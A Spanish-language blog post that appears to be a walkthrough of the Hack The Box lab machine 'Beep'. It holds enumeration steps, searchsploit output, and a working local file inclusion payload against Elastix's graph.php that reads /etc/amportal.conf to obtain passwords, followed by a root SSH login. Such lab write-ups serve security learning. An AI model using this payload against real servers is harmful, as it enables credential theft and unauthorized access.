Beep

by | May 28, 2018 | Blog

Ok, se cruzo el fin de semana y aunque mi plan era no fallar, pero aja, se complicó todo. Lo bueno es que me fui a pescar, el Real madrid gano su champions 13 y el domingo programé una página web y jugué un torneo de ping pong.

Así que a darle. Esta box debe estar sencilla.

Lo primero que hay que hacer es nmap como siempre y dirbusters peeeero en este caso hay que tener cuidado de correr el tcp completo, hay muchos muchos puertos abiertos.

Siempre que haya web hay que checar dirbuster. Teniendo en cuenta dos cosas

  1. que este la s de https
  2.  que no haga busquedas recursivas porque hay muchos folders y nunca va a acabar.

Podemos ver que Elastix is running the port 443 ja corriendo en el puerto 443… sin mi inglés que me traiciona.

Corriendo searchexploit podemos ver que hay cosas interesantes como

root@kali:~# searchsploit elastix
--------------------------------------------- ----------------------------------
 Exploit Title                               |  Path
                                             | (/usr/share/exploitdb/)
--------------------------------------------- ----------------------------------
Elastix - 'page' Cross-Site Scripting        | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vuln | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scriptin | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclu | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection            | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection           | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code | exploits/php/webapps/18650.py
--------------------------------------------- ----------------------------------
root@kali:~# searchsploit -x exploits/php/webapps/37637.pl
Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
    URL: https://www.exploit-db.com/exploits/37637/
   Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl

Como por ejemplo

#------------------------------------------------------------------------------------# 
#Elastix is an Open Source Sofware to establish Unified Communications. 
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------#
############################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;) 
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki   \n";
print "\t 0day Elastix 2.2.0  \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Si probamos ese link podemos ver en modo page source passwords:

root@kali:~# ssh [email protected]
The authenticity of host '10.10.10.7 (10.10.10.7)' can't be established.
RSA key fingerprint is SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg1pEJ0XXD5nFEjki/hI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.7' (RSA) to the list of known hosts.
[email protected]'s password: 
Last login: Fri Aug 25 18:05:54 2017

Welcome to Elastix

Y listo, entramos con root.

/home/fanis/user.txt ​and
/root/root.txt

🙂